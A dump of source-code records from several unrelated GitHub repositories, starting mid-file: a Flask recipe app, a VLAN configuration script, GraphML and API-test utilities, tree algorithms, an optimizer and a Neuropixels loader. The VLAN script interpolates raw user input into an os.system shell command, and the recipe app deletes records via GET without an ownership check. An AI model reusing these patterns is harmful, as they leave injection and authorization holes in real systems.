Recipe.query.filter_by(id=recipe_id).first()\r\n new_dislike = recipe.dislike+1\r\n recipe.dislike = new_dislike\r\n db.session.commit()\r\n recipes = Recipe.query.order_by(Recipe.like.desc()).all()\r\n comments = Comment.query.all()\r\n return 
render_template('index.html', recipes=recipes, comments=comments)\r\n\r\n@app.route('/recipe', methods=['POST', 'GET'])\r\n@login_required\r\ndef recipe():\r\n user = User.query.filter_by(username=current_user.username).first()\r\n form = RecipeForm()\r\n if request.method == \"GET\":\r\n form_mode = \"add\"\r\n recipes = Recipe.query.filter_by(user_id=user.id).order_by(Recipe.like.desc()).all()\r\n if 'edit_recipe' in request.args:\r\n recipe_id = request.args.get('edit_recipe')\r\n recipe_to_update = Recipe.query.filter_by(id=recipe_id).first()\r\n edit_form = RecipeForm(recipe_to_update)\r\n edit_form.ingredients.data = recipe_to_update.ingredients\r\n edit_form.title.data = recipe_to_update.title\r\n edit_form.description.data = recipe_to_update.description\r\n edit_form.notes.data = recipe_to_update.notes\r\n edit_form.instructions.data = recipe_to_update.instructions\r\n edit_form.submit.data = \"Update recipe!\"\r\n form_mode = \"edit\"\r\n form = edit_form\r\n return render_template('recipe.html', recipes=recipes, form=form, form_mode=form_mode)\r\n elif request.method == \"POST\":\r\n form = RecipeForm(request.form)\r\n if form.validate_on_submit():\r\n print(form)\r\n if 'edit_recipe' not in request.args:\r\n # Create a db.Model type of Ingredient from the form data received\r\n new_recipe = Recipe(title=form.title.data, description=form.description.data,\r\n instructions=form.instructions.data, ingredients=form.ingredients.data,\r\n notes=form.notes.data, user_id=user.id)\r\n # Add the record in a pending transaction\r\n db.session.add(new_recipe)\r\n # Finally commit it to push the changes to the database\r\n db.session.commit()\r\n # Saved, send a get request on homepage\r\n return redirect('/')\r\n else:\r\n # Need to edit recipe\r\n recipe_id = request.args.get('edit_recipe')\r\n to_update_recipe = Recipe.query.filter_by(id=recipe_id).first()\r\n to_update_recipe.title = form.title.data\r\n to_update_recipe.description = form.description.data\r\n to_update_recipe.ingredients = form.ingredients.data\r\n to_update_recipe.instructions = form.instructions.data\r\n to_update_recipe.notes = form.notes.data\r\n db.session.add(to_update_recipe)\r\n db.session.commit()\r\n return redirect('/')\r\n return render_template('recipe.html')\r\n\r\n\r\n@app.route('/recipe/delete/', methods=['GET'])\r\n@login_required\r\ndef delete_recipe(recipe_id):\r\n recipe = Recipe.query.filter_by(id=recipe_id).first()\r\n db.session.delete(recipe)\r\n db.session.commit()\r\n return redirect('/')\r\n","repo_name":"NanaOkada/cooking","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":11530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74165269252","text":"import os\nimport subprocess\nimport re\n\n\nwhile 1:\n print('enter 1 to Add vlan for interface')\n print('enter 0 to exit')\n choose = input('choose: ')\n \n if int(choose) == 1:\n print('Add vlan for interface:')\n inf = input('Enter the interface you want to add vlan: ')\n\n #check vlan\n cmd_bf = ['bridge', 'vlan', 'ciscoshow']\n proc = subprocess.Popen(cmd_bf, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n o_bf, e_bf = proc.communicate()\n data_bf = str(o_bf)\n vlan_c = []\n data_bf = data_bf.replace('\\\\n','')\n data_bf = data_bf.replace('\\\\t',' ')\n data_bf = data_bf.replace('-','')\n arr_data = data_bf.split(' ')\n print('Vlan has been config:')\n for i in arr_data:\n if re.findall('vlan',i):\n print(i)\n num_vlan = []\n for i in arr_data:\n if 
re.findall('vlan',i):\n temp = re.sub(r'\\D', \"\",i)\n num_vlan.append(int(temp))\n print(\"vlan was config:\" + str(num_vlan))\n\n vlan = input('Enter the vlan you want to add interface: ')\n while 1:\n check = 0;\n for vlan_tmp in num_vlan:\n if int(vlan_tmp) == int(vlan):\n check = 1;\n if int(check) == 1:\n break;\n else:\n vlan = input('please enter value vlan was config: ')\n cmd1 = '/usr/bin/clish -x /Klish-XML/ -c \"enable network\" -c \"configure terminal\" -c \"interface ethernet %s\" -c \"switchport mode access\" -c \"switchport access vlan %s\" '%(inf,vlan)\n print(cmd1)\n os.system(str(cmd1))\n # check interface vlan\n\n cmd_bf = ['bridge', 'vlan', 'ciscoshow']\n proc = subprocess.Popen(cmd_bf, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n line_num = 0;\n interface = []\n count = int(0)\n while True:\n line = proc.stdout.readline()\n if not line:\n break\n line_temp = str(line)\n line_temp = line_temp.replace('\\\\t',' ')\n line_temp = line_temp.replace('\\\\n','')\n line_temp = line_temp.replace(\"'\",\" \")\n line_temp = line_temp.replace(\",\",\" \")\n vlan_temp = 'vlan%s'%(vlan)\n if re.findall(vlan_temp,line_temp):\n temp = line_temp\n check_vlan = str(temp).split(' ')\n print(check_vlan)\n for i in check_vlan:\n if(str(i) == str(inf)):\n count = count + 1\n if count == 0:\n print('FALSE')\n else:\n print('PASSED')\n\n elif int(choose) == 0:\n break\n else:\n print('please choose 1 or 0')\n","repo_name":"HaiAnh1802/AutoTest","sub_path":"VLAN/add_interface_vlan.py","file_name":"add_interface_vlan.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19725811479","text":"import argparse\nimport pandas as pd\nimport get_counts as gc\nimport update_graphml as ug\n\nrecip_rels = {'P527': 'P361',\n 'P361': 'P527',\n 'P2176': 'P2175',\n 'P2175': 'P2176',\n 'P702': 'P688',\n 'P688': 'P702',\n 'P1343': 'P4510',\n 'P4510': 'P1343',\n 'P828': 'P1542',\n 'P1542': 'P828',\n 'P3781': 'P3780',\n 'P3780': 'P3781'}\n\ndef get_info_from_graphml(filename, outname=None, endpoint=None):\n\n query_list = dict()\n\n # Use the desired endpoint\n if endpoint is not None:\n gc.change_endpoint(endpoint)\n\n # Read the graphml file and break into nodes and edged\n tree = ug.read_graphml(filename)\n root = tree.getroot()\n graph = ug.get_graph(root)\n nodes = ug.get_nodes(graph)\n edges = ug.get_edges(graph)\n\n # Get info specific to this WikiData items from the graph\n n_id_map, e_id_map = ug.get_node_edge_attrib_mappers(root)\n n_to_qid = ug.get_node_id_to_qid(nodes, n_id_map)\n node_info = ug.get_node_info_to_update(nodes, n_id_map)\n edge_info = ug.get_edge_info_to_update(edges, n_to_qid, e_id_map)\n\n prop_names = gc.get_prop_labels()\n node_names = {k: v.get('NodeLabel') for k, v in node_info.items()}\n\n\n # Initialize the variables to collect data\n n_ids = []\n n_names = []\n p_ids = []\n p_names = []\n counts = []\n # Loop through and extract all node property information\n for n_id, n_info in node_info.items():\n for prop, count in n_info.get('props', dict()).items():\n n_ids.append(n_id)\n n_names.append(node_names.get(n_id))\n p_ids.append(prop)\n p_names.append(prop_names.get(prop))\n counts.append(count)\n # Compile results to DataFrame\n nodes_out = pd.DataFrame({'subject_type_name': n_names, 'subject_type_qid': n_ids,\n 'property_name': p_names, 'property_pid': p_ids,\n 'count': counts})\n # sort the nodes by count for easier comparison\n nodes_out = 
nodes_out.sort_values(['subject_type_name', 'count'], ascending=[True, False])\n\n # Initialize edge information collection\n n1_ids = []\n n1_names = []\n n2_ids = []\n n2_names = []\n p_ids = []\n p_names = []\n for edge_key in edge_info.keys():\n n1_id = edge_key[0]\n p_id = edge_key[1]\n n2_id = edge_key[2]\n\n n1_ids.append(n1_id)\n n1_names.append(node_names.get(n1_id))\n p_ids.append(p_id)\n p_names.append(prop_names.get(p_id))\n n2_ids.append(n2_id)\n n2_names.append(node_names.get(n2_id))\n\n # Get revierse edge info if a reciprical relationship\n if p_id in recip_rels:\n n1_ids.append(n2_id)\n n1_names.append(node_names.get(n2_id))\n p_ids.append(recip_rels[p_id])\n p_names.append(prop_names.get(recip_rels[p_id]))\n n2_ids.append(n1_id)\n n2_names.append(node_names.get(n1_id))\n\n edges_out = pd.DataFrame({'subject_type_name': n1_names, 'subject_type_qid': n1_ids,\n 'property_name': p_names, 'property_pid': p_ids,\n 'object_type_name': n2_names, 'object_type_qid': n2_ids})\n\n out = pd.concat([nodes_out, edges_out], sort=False).drop('count', axis=1)\n if outname is None:\n outname = 'query_info.csv'\n out.to_csv(outname, index=False)\n\n\nif __name__ == \"__main__\":\n # Command line Parsing\n parser = argparse.ArgumentParser(description='Parse a complete .graphml to get arguments for querying data'+\n ' provenance. (input to get_prov_counts.py)')\n parser.add_argument('filename', help=\"The .graphml to parse for subject, predicate, object and property\" + \\\n \" identifiers and information\", type=str)\n parser.add_argument('-o', '--outname', help=\"The name of the output file. (Default 'query_info.csv')\",\n type=str, default=None)\n parser.add_argument('-e', '--endpoint', help='Use a wikibase endpoint other than standard wikidata', type=str,\n default=None)\n\n #Unpack the CLI args\n args = parser.parse_args()\n filename = args.filename\n outname = args.outname\n endpoint = args.endpoint\n\n # run the pipeline\n get_info_from_graphml(filename, outname=outname, endpoint=None)\n\n","repo_name":"SuLab/genewikiworld","sub_path":"src/parse_graphml_connectivity.py","file_name":"parse_graphml_connectivity.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"724571368","text":"import time\nfrom assertion import *\nfrom http_methods import HttpMethod\nfrom utils.const.const_authorization import *\n\n\nurl = 'https://abc.ru'\npath = '/api/v1/auth/'\nurl_auth = url + path\n\n\nclass Authorization(HttpMethod):\n\n \"\"\"Проверка наличия аккаунта /api/v1/auth/check-login\"\"\"\n def checking_account_availability(self):\n print('\\nPOST Проверка наличия аккаунта /api/v1/auth/check-login')\n response = self.post(url_auth + 'check-login',\n post_json=json_for_check_email_for_login)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, expected_params_check_login)\n Assertions.assert_value_in_json(response, 'registrationRequired', False,\n response.json()['data'][\n 'registrationRequired'])\n print(\"response_json = \", response.json())\n\n \"\"\"Проверка наличия аккаунта администратора \n /api/v1/auth/admin/check-login\"\"\"\n def checking_admin_account_availability(self):\n print('\\nPOST Проверка наличия аккаунта администратора '\n '/api/v1/auth/check-login')\n response = self.post(url_auth + 'admin/check-login',\n post_json=json_for_check_admin_acount)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, 
expected_params_check_admin_acount)\n Assertions.assert_value_in_json(response, 'registrationRequired', True,\n response.json()['data'][\n 'registrationRequired'])\n print(\"response_json = \", response.json())\n\n \"\"\"Отправка кода подтверждения /api/v1/auth/confirm-code/send\"\"\"\n def send_confirm_code(self):\n print('\\nPOST Отправка кода подтверждения '\n '/api/v1/auth/confirm-code/send')\n response = self.post(url_auth + 'confirm-code/send',\n post_json=json_for_send_confirm_code)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, list_of_expected_params_from_comfirm_code)\n Assertions.assert_value_in_json(response, 'status', 'ok',\n response.json()['data']['status'])\n print(\"response_json = \", response.json())\n\n \"\"\"Авторизация /api/v1/auth/login\"\"\"\n def login(self):\n print('\\nPOST Авторизация /api/v1/auth/login')\n response = self.post(url_auth + 'login',\n post_json=json_for_login)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, expected_params_login)\n print(\"response_json = \", response.json())\n global refresh, access\n refresh = response.json()['data']['refresh']\n access = response.json()['data']['access']\n\n \"\"\"Обновление токена /api/v1/auth/token/refresh\"\"\"\n def refresh_token(self):\n print('\\nPOST Обновление токена /api/v1/auth/token/refresh')\n json_for_refresh = {\"refresh\": refresh}\n response = self.post(url_auth + 'token/refresh',\n post_json=json_for_refresh)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, expected_params_resresh)\n Assertions.\\\n assert_value_in_json_not_equal_to_actual(\n response, 'access', access, response.json()['data']['access'])\n Assertions.\\\n assert_value_in_json_not_equal_to_actual(\n response, 'refresh', refresh, response.json()[\n 'data']['refresh'])\n Assertions.\\\n assert_value_in_json_not_equal_to_actual(\n response, 'expire', round(time.time()),\n response.json()['data']['expire'])\n print(\"response_json = \", response.json())\n","repo_name":"BondarenkoAleksey/api_example","sub_path":"utils/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26928805473","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAuthors: Hung-Hsin Chen \nLicense: GPL v2\n\"\"\"\n\ndef pre_order_to_binary_search_tree(nodes):\n \"\"\"\n dict to implement binary tree,\n nodes: list of values\n \"\"\"\n stack = []\n tree = {}\n stack.append((nodes, tree))\n\n while len(stack):\n sub_nodes, sub_tree = stack.pop()\n root = sub_nodes[0]\n sub_tree['value'] = root\n\n if len(sub_nodes) == 1:\n # leaf node\n sub_tree['lchild'] = sub_tree['rchild'] = None\n else:\n # internal node\n smaller = 0\n for node in sub_nodes[1:]:\n if node > root:\n break\n smaller += 1\n # print (\"sub_nodes:\", sub_nodes, root)\n # print (\"slice:\", smaller, sub_nodes[1:1+smaller],\n # sub_nodes[1 + smaller:])\n # check left sub-tree\n if smaller:\n left_children = sub_nodes[1:1 + smaller]\n sub_tree['lchild'] = {}\n stack.append((left_children, sub_tree['lchild']))\n else:\n sub_tree['lchild'] = None\n\n # check right sub-tree\n larger = len(sub_nodes) - smaller - 1\n if larger:\n right_children = sub_nodes[1 + smaller:]\n sub_tree['rchild'] = {}\n stack.append((right_children, sub_tree['rchild']))\n else:\n sub_tree['rchild'] = None\n\n return tree\n\n\ndef 
pre_in_order_to_binary_tree(pre_nodes, in_nodes):\n \"\"\"\n dict to implement a binary tree,\n nodes: list of values\n \"\"\"\n tree = {}\n stack = []\n stack.append((pre_nodes, in_nodes, tree))\n while len(stack):\n sub_pre_nodes, sub_in_nodes, sub_tree = stack.pop()\n root = sub_pre_nodes[0]\n sub_tree['value'] = root\n\n if len(sub_pre_nodes) == 1:\n # leaf node\n sub_tree['lchild'] = sub_tree['rchild'] = None\n else:\n # internal node\n # distinguish left and right sub_trees in infix nodes\n left_in_count = 0\n for node in sub_in_nodes:\n if node == root:\n break\n left_in_count += 1\n # print (left_in_count,\n # \"infix left:\", sub_in_nodes[:left_in_count],\n # \" right:\", sub_in_nodes[left_in_count+1:])\n # print (\"prefix left:\", sub_pre_nodes[1:1 + left_in_count],\n # \"right:\",sub_pre_nodes[1 + left_in_count:])\n\n # left sub_tree\n if left_in_count:\n sub_pre_left_nodes = sub_pre_nodes[1:1 + left_in_count]\n sub_in_left_nodes = sub_in_nodes[:left_in_count]\n sub_tree['lchild'] = {}\n stack.append((sub_pre_left_nodes, sub_in_left_nodes,\n sub_tree['lchild']))\n else:\n sub_tree['lchild'] = None\n\n # right sub_tree\n right_in_count = len(sub_in_nodes) - left_in_count - 1\n if right_in_count:\n sub_pre_right_nodes = sub_pre_nodes[1 + left_in_count:]\n sub_in_right_nodes = sub_in_nodes[left_in_count+1:]\n sub_tree['rchild'] = {}\n stack.append((sub_pre_right_nodes, sub_in_right_nodes,\n sub_tree['rchild']))\n else:\n sub_tree['rchild'] = None\n\n return tree\n\n\ndef post_in_order_to_binary_tree(post_nodes, in_nodes):\n \"\"\"\n dict to implement a binary tree,\n nodes: list of values\n \"\"\"\n tree = {}\n stack = []\n stack.append((post_nodes, in_nodes, tree))\n while len(stack):\n sub_post_nodes, sub_in_nodes, sub_tree = stack.pop()\n root = sub_post_nodes[-1]\n sub_tree['value'] = root\n\n if len(sub_post_nodes) == 1:\n # leaf node\n sub_tree['lchild'] = sub_tree['rchild'] = None\n else:\n # internal node\n # distinguish left and right sub_trees in infix nodes\n left_in_count = 0\n for node in sub_in_nodes:\n if node == root:\n break\n left_in_count += 1\n\n # left sub_tree\n if left_in_count:\n sub_post_left_nodes = sub_post_nodes[:left_in_count]\n sub_in_left_nodes = sub_in_nodes[:left_in_count]\n sub_tree['lchild'] = {}\n stack.append((sub_post_left_nodes, sub_in_left_nodes,\n sub_tree['lchild']))\n else:\n sub_tree['lchild'] = None\n\n # right sub_tree\n right_in_count = len(sub_in_nodes) - left_in_count - 1\n if right_in_count:\n sub_post_right_nodes = sub_post_nodes[left_in_count:-1]\n sub_in_right_nodes = sub_in_nodes[left_in_count + 1:]\n sub_tree['rchild'] = {}\n stack.append((sub_post_right_nodes, sub_in_right_nodes,\n sub_tree['rchild']))\n else:\n sub_tree['rchild'] = None\n\n return tree\n\n\ndef pre_order(tree, output=[]):\n \"\"\" value -> left -> right \"\"\"\n if not tree:\n return\n output.append(tree['value'])\n pre_order(tree['lchild'], output)\n pre_order(tree['rchild'], output)\n return output\n\n\ndef pre_order_stack(tree):\n if not tree:\n return\n\n stack = [tree, ]\n while stack:\n node = stack.pop()\n print(node['value'])\n\n if node['lchild']:\n stack.append(node['lchild'])\n if node['rchild']:\n stack.append(node['rchild'])\n\n\n\ndef post_order(tree, output=[]):\n \"\"\" left -> right -> value \"\"\"\n if not tree:\n return\n post_order(tree['lchild'], output)\n post_order(tree['rchild'], output)\n output.append(tree['value'])\n return output\n\n\ndef greedy_min_cost_traversal(tree):\n \"\"\"\n on each branch of the tree, always choose the node 
with smaller value.\n \"\"\"\n # greedy find the path with smaller values in each branch first\n if not tree:\n return 0\n\n greedy_cost = 0\n greedy_path = []\n sub_tree = tree\n while sub_tree:\n greedy_cost += sub_tree['value']\n greedy_path.append(sub_tree['value'])\n if sub_tree['lchild'] and sub_tree['rchild']:\n # both sub_trees exist\n if sub_tree['lchild']['value'] < sub_tree['rchild']['value']:\n sub_tree = sub_tree['lchild']\n else:\n sub_tree = sub_tree['rchild']\n elif not sub_tree['rchild']:\n # only left sub_tree exists\n sub_tree = sub_tree['lchild']\n elif not sub_tree['lchild']:\n # only right sub_tree exists\n sub_tree = sub_tree['rchild']\n\n return greedy_cost, greedy_path\n\ndef all_binary_tree_paths(tree, output=[], paths=[]):\n \"\"\"\n traversal all paths in a tree\n return list of all paths (a path is the nodes from root to leaf)\n \"\"\"\n\n if tree:\n output.append(tree['value'])\n if tree['lchild']:\n all_binary_tree_paths(tree['lchild'], output, paths)\n if tree['rchild']:\n all_binary_tree_paths(tree['rchild'], output, paths)\n elif not tree['lchild'] and not tree['rchild']:\n paths.append(output[:])\n output.pop()\n return paths","repo_name":"chenhh/Uva","sub_path":"utility/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"13766127235","text":"import torch\nfrom torch.optim.optimizer import Optimizer\n\n\nclass GradientDescentWithMomentum(Optimizer):\n def __init__(self, params, lr=0.1, decay=0.9):\n super(GradientDescentWithMomentum, self).__init__(\n params, {'lr': lr, 'decay': decay})\n for group in self.param_groups:\n for p in group['params']:\n self.state[p]['v'] = torch.zeros_like(p)\n\n @torch.no_grad()\n def step(self):\n for group in self.param_groups:\n for p in group['params']:\n if p.grad is not None:\n state = self.state[p]\n state['v'].mul_(group['decay']).add_(\n p.grad, alpha=-group['lr'])\n p.add_(state['v'])\n","repo_name":"vitaminac/miniai","sub_path":"miniai/opt/momentum.py","file_name":"momentum.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9794906959","text":"## This function divides the rectangle into fewest number of squares.\n\ndef sqInRect(lng,wdth):\n if lng==wdth:\n return None\n else:\n dimensions=[]\n area=lng*wdth\n intSqRoot=int((area)**0.5)\n rectSide=sorted(range(1,intSqRoot+1),reverse=True)\n for sqSide in rectSide:\n while area>=sqSide**2:\n dimensions.append(sqSide)\n area-=sqSide**2\n return dimensions\n\nprint(sqInRect(5,3))\n","repo_name":"abiswas20/codewars_code","sub_path":"cutTrueRectangleIntoSquares.py","file_name":"cutTrueRectangleIntoSquares.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8223102381","text":"__author__ = \"mfreer\"\n__date__ = \"2011-09-15 17:09\"\n__version__ = \"1.6\"\n__all__ = [\"FileCore\", \"get_file_list\"]\n\nimport glob\nimport logging\n\nclass FileCore(object):\n \"\"\"\n Abstract class which holds basic file access methods and attributes.\n Designed to be subclassed by NetCDF, NASA Ames and basic text file\n classes.\n\n **Constructor Variables**\n \n :param string filename: Optional -\n Name of file to open.\n :param char perms: Optional -\n Permissions used to open file. 
Options are ``w`` for write (overwrites data in file),\n ``a`` and ``r+`` for append, and ``r`` for read. ``r`` is the default value\n \"\"\"\n\n def __init__(self, filename=None, perms='r', **kwargs):\n \"\"\"\n Initializes file instance.\n\n :param string filename: Optional -\n Name of file to open.\n :param char perms: Optional -\n Permissions used to open file. Options are ``w`` for write (overwrites data in file),\n ``a`` and ``r+`` for append, and ``r`` for read. ``r`` is the default value\n \"\"\"\n\n logging.debug('egads - input_core.py - FileCore - __init__ - filename ' + str(filename) + \n ', perms ' + perms + ', kwargs ' + str(kwargs))\n self.f = None\n self.filename = filename\n self.perms = perms\n for key, val in kwargs.iteritems():\n setattr(self, key, val)\n if filename is not None:\n self._open_file(filename, perms)\n\n def open(self, filename, perms=None):\n \"\"\"\n Opens file given filename.\n\n :param string filename:\n Name of file to open.\n :param char perms: Optional -\n Permissions used to open file. Options are ``w`` for write (overwrites data in file),\n ``a`` and ``r+`` for append, and ``r`` for read. ``r`` is the default value\n \"\"\"\n\n logging.debug('egads - input_core.py - FileCore - open - filename ' + str(filename) + ', perms ' + str(perms))\n if perms is not None:\n self.perms = perms\n else:\n perms = self.perms\n self._open_file(filename, perms)\n\n def close(self):\n \"\"\"\n Close opened file.\n \"\"\"\n \n logging.debug('egads - input_core.py - FileCore - close - filename ' + str(self.filename))\n if self.f is not None:\n self.f.close()\n self.f = None\n self.filename = None\n\n def get_perms(self):\n \"\"\"\n Returns the current permissions on the file that is open. Returns None if\n no file is currently open. Options are ``w`` for write (overwrites\n data in file),``a`` and ``r+`` for append, and ``r`` for read.\n \"\"\"\n \n logging.debug('egads - input_core.py - FileCore - get_perms - perms ' + str(self.perms))\n if self.f is not None:\n return self.perms\n else:\n return\n\n def get_filename(self):\n \"\"\"\n If file is open, returns the filename.\n \"\"\"\n \n logging.debug('egads - input_core.py - FileCore - get_filename - filename ' + str(self.filename))\n return self.filename\n\n logging.info('egads - input_core.py - FileCore has been loaded')\n\ndef get_file_list(path):\n \"\"\"\n Given path, returns a list of all files in that path. Wildcards are supported.\n\n Example::\n \n file_list = get_file_list('data/*.nc')\n \"\"\"\n\n logging.debug('egads - input_core.py - get_file_list - path ' + str(path))\n return glob.glob(path)\n\n","repo_name":"EUFAR/egads","sub_path":"egads/input/input_core.py","file_name":"input_core.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"43"} +{"seq_id":"17947882808","text":"# This code loads Neuropixels data acquired by SpikeGLX and processed by:\n# CatGT, Kilosort, Tprime, CWaves, and associated postprocessing from https://github.com/jenniferColonell/ecephys_spike_sorting\n# Data is packaged into a numpy object providing convenient access to spike times, event times, and relevant cluster metrics\n\nimport numpy as np\nimport os\nimport sys\nimport glob\nimport pandas as pd\nimport pickle\nimport scipy\nfrom joblib import Parallel, delayed\n\nimport lfp\nimport sglx_util\n\n\nclass MultiprobeData(object):\n \"\"\"\n Class used to load all the sorting results from a single experiment. 
\n This assumes that Tprime has already been run and aligned event times are available. \n \"\"\"\n def __init__(self, mouse, date, load_waveforms=False, load_lfp=True, qc='bombcell'):\n self._expts = [] # list of probe paths\n self._ncell = 0\n self._spike_times = None # Nspikes x 1\n self._clusts = None # Nspikes x 1\n self._clust_id = None # Nclust x 1 IDs of each cluster (in order)\n self._clust_depths = None\n self._clust_amps = None\n self._probe_id = None # Nclust x 1 which probe each cluster came from\n self._tract_names = []\n self._chan_map = []\n self._chan_pos = []\n self._templates = []\n self._winv = []\n self._mean_waveforms = None\n self._ntemplates = 0\n self._spike_templates = []\n self._mouse = mouse\n self._date = date\n\n self._lfp = []\n self._lfp_fs = []\n self._lfp_chans = []\n self._lfp_probe_ids = []\n\n self._load_lfp = load_lfp\n self._load_waveforms = load_waveforms\n self._qc = qc\n # experiment-specific event info\n self._events = None\n\n def add_experiment(self, probe_path, tract_name):\n # Add probe paths\n self._expts.append(probe_path)\n self._tract_names.append(tract_name)\n\n def add_events(self, data_path, event_map):\n # Customize based on recorded events on the Nidaq\n # Assume already aligned using Tprime\n # data_path: path to folder containing Tprime output\n # event_map: name of events corresponding to nidaq channels\n # note that the key in event_map should unambiguously match substring in the tprime output file name.\n # For example: {'XA_2': 'trial', 'XA_3': 'stim'}\n events = {}\n for k,v in event_map.items():\n path = glob.glob(os.path.join(data_path, f\"*{k}*\"))[0]\n events[v] = np.loadtxt(path)\n self._events = events\n\n\n def combine_experiments(self, ref_expt_idx=0, clust_offset=10000):\n \"\"\"\n Inputs:\n ref_expt_idx: experiment index to use as reference\n clust_offset: maximum number of possible clusters in each experiment, to uniquely identify clusters\n \"\"\"\n for i, probe_path in enumerate(self._expts):\n expt = EPhyClusts(self._expts[i], self._load_waveforms, load_lfp=self._load_lfp, qc=self._qc)\n self._chan_map.append(expt._chan_map)\n self._chan_pos.append(expt._chan_pos)\n self._winv.append(expt._winv)\n self._templates.append(expt._templates)\n self._spike_templates.append(expt._spike_templates)\n self._ntemplates += expt._ntemplates\n self._ncell += len(expt._metrics[expt._metrics[\"noise\"]==0])\n #self._amplitudes.append(expt._amplitudes)\n if self._load_waveforms:\n if i == 0:\n self._mean_waveforms = expt._mean_waveforms\n else:\n self._mean_waveforms = np.concatenate([self._mean_waveforms, expt._mean_waveforms])\n \n old_clust_ids = expt._metrics[\"cluster_id\"] # id numbers\n old_clusts = expt._clusts # spikes tagged by id\n new_clusts = old_clusts.copy()\n new_clust_ids = old_clust_ids + clust_offset*i\n expt._metrics[\"n_spikes\"] = np.unique(old_clusts, return_counts=True)[1]\n # Performant relabeling of the spikes\n reid_dict = dict(zip(old_clust_ids, new_clust_ids))\n replace = np.array([list(reid_dict.keys()), list(reid_dict.values())])\n new_clusts = replace[1, np.searchsorted(replace[0, :], old_clusts)]\n expt._metrics[\"cluster_id\"] = new_clust_ids\n\n if i == 0:\n self._clust_depths = expt._clust_depths\n self._clust_xpos = expt._clust_xpos\n self._probe_id = np.zeros(len(expt._clust_id),dtype=np.int)\n self._spike_times = expt._spike_times\n self._clust_id = new_clust_ids\n self._clusts = new_clusts\n self._metrics = expt._metrics\n if self._load_lfp:\n self._lfp.append(expt._lfp)\n 
self._lfp_fs.append(expt._lfp_fs)\n self._lfp_chans = expt._lfp_chans\n self._lfp_probe_ids = i*np.ones(len(expt._lfp_chans), dtype=np.int)\n else:\n self._clust_depths = np.concatenate([self._clust_depths, expt._clust_depths])\n self._clust_xpos = np.concatenate([self._clust_xpos, expt._clust_xpos])\n self._probe_id = np.concatenate([self._probe_id, i*np.ones(len(expt._clust_id), dtype=np.int)])\n self._spike_times = np.concatenate([self._spike_times, expt._spike_times])\n self._clust_id = np.concatenate([self._clust_id, new_clust_ids])\n self._clusts = np.concatenate([self._clusts, new_clusts])\n self._metrics = pd.concat([self._metrics, expt._metrics], ignore_index=True)\n if self._load_lfp:\n self._lfp.append(expt._lfp)\n self._lfp_fs.append(expt._lfp_fs)\n self._lfp_chans = np.concatenate([self._lfp_chans, expt._lfp_chans])\n self._lfp_probe_ids = np.concatenate([self._lfp_probe_ids, i*np.ones(len(expt._lfp_chans), dtype=np.int)])\n \n print(\"Sorting spike times\")\n sort_idx = np.argsort(self._spike_times)\n \n self._clusts = self._clusts[sort_idx]\n self._spike_times = self._spike_times[sort_idx]\n\n if self._load_lfp:\n self._lfp, self._lfp_fs = self.rescale_lfps(self._lfp, self._lfp_fs)\n\n \n def save_data(self, out_path):\n with open(out_path, 'wb') as f:\n pickle.dump(self,f)\n\n def save_units_npz(out_path, self):\n np.savez(out_path, spike_times=self._spike_times, clusts=self._clusts,\n clust_id=self._clust_id, clust_depths=self._clust_depths,\n probe_id=self._probe_id, metrics=self._metrics,\n events=self._events, mouse_name=self._mouse_name, unit_locs=self._unit_locs,\n chan_locs=self._chan_locs, chan_probe_id=self._chan_probe_id)\n\n def load_units_npz(self, fpath):\n d = np.load(fpath)\n self._spike_times = d['spike_times']\n self._clusts = d['clusts']\n self._clust_id = d['clust_id']\n self._clust_depths = d['clust_depths']\n self._probe_id = d['probe_id']\n self._metrics = d['metrics']\n self._events = d['events']\n self._mouse_name = d['mouse_name']\n self._unit_locs = d['unit_locs']\n self._chan_locs = d['chan_locs']\n self._chan_probe_id = d['chan_probe_id']\n\n def rescale_lfps(self, lfps, sample_rates):\n \"\"\"\n Take in a list of LFP data and a list of sample rates.\n Resize LFP data in time dimension to slowest sampling rate.\n Return the scaled LFPs and the new (minimum) sampling rate\n \"\"\"\n min_fs_ix = np.argmin(sample_rates)\n min_fs = sample_rates[min_fs_ix]\n zoom_factors = [(min_fs/fs,1) for fs in sample_rates]\n\n scaled_lfps = Parallel(n_jobs=-1)(delayed(scipy.ndimage.zoom)(lfps[i], zoom_factors[i], order=1) for i in range(len(sample_rates)))\n shapes = np.array([l.shape[0] for l in scaled_lfps])\n scaled_lfps = [l[:np.min(shapes),:] for l in scaled_lfps]\n scaled_lfps = np.concatenate(scaled_lfps, axis=1)\n return scaled_lfps, min_fs\n\nclass EPhyClusts(object):\n \"\"\"\n Class to load the results of a KiloSort + Phy + Quality Scoring + CWaves for a single probe. 
